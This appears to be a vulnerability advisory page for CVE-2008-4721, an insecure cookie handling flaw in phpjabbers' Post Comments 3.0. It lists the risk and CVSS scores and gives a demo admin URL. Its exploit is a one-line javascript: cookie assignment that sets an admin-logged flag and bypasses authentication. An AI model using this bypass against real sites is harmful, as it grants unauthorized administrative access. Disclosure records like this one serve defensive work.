Post Comments 3.0 Insecure Cookie Handling Vulnerability

2008-10-26 / 2008-10-27

Credit: Crackers_Child

Risk: High

Local: No

Remote: Yes

CVE: CVE-2008-4721

CWE: NVD-CWE-noinfo

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

Post Comments v3.0 Insecure Cookie Handling Vulnerability
****************************
By Crackers_Child
****************************
Demo : http://www.phpjabbers.com/post-comment/try/admin.php

Vendor :   by phpjabbers.com

Exploit : javascript:document.cookie = "PostCommentsAdmin=logged; path=/";
****************************
Tum Musluman Aleminin Ramazan Bayrami Kutlu Olsun.
****************************

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Post Comments 3.0 Insecure Cookie Handling Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.